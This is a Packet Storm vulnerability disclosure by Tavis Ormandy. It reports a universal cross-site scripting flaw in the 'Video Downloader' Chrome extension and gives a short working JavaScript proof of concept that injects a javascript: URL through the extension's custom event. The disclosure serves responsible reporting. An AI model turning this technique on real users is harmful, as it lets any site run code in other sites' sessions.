Video Downloader Universal Cross Site Scripting

2018-04-06T00:00:00
ID PACKETSTORM:147073
Type packetstorm
Reporter Tavis Ormandy
Modified 2018-04-06T00:00:00

Description

                                        
                                            `Video Downloader Extension: Universal XSS   
  
  
  
  
Browsing through the list of most popular Chrome extensions, I noticed this extension with 4M users:  
  
<a href="https://chrome.google.com/webstore/detail/video-downloader-professi/elicpjhcidhpjomhibiffojpinpmmpil?hl=en" title="" class="" rel="nofollow">https://chrome.google.com/webstore/detail/video-downloader-professi/elicpjhcidhpjomhibiffojpinpmmpil?hl=en</a>  
  
It has a pretty obvious universal XSS (i.e. it effectively lets any site take over any other site).  
  
Any website can do this:  
  
// Change the active tab  
window.open("https://google.com");  
  
// Run code in the new tab  
setTimeout('document.dispatchEvent(new CustomEvent("link64_msgAddLinks", {detail: {type: "__L64_NAVIGATE_CHROME_URL", url: "javascript:alert(document.title);window.close()"}}))', 1000);  
  
That will run arbitrary code on <a href="http://google.com" title="" class="" rel="nofollow">google.com</a>.  
  
I reported this bug to the cws team.  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: taviso  
  
`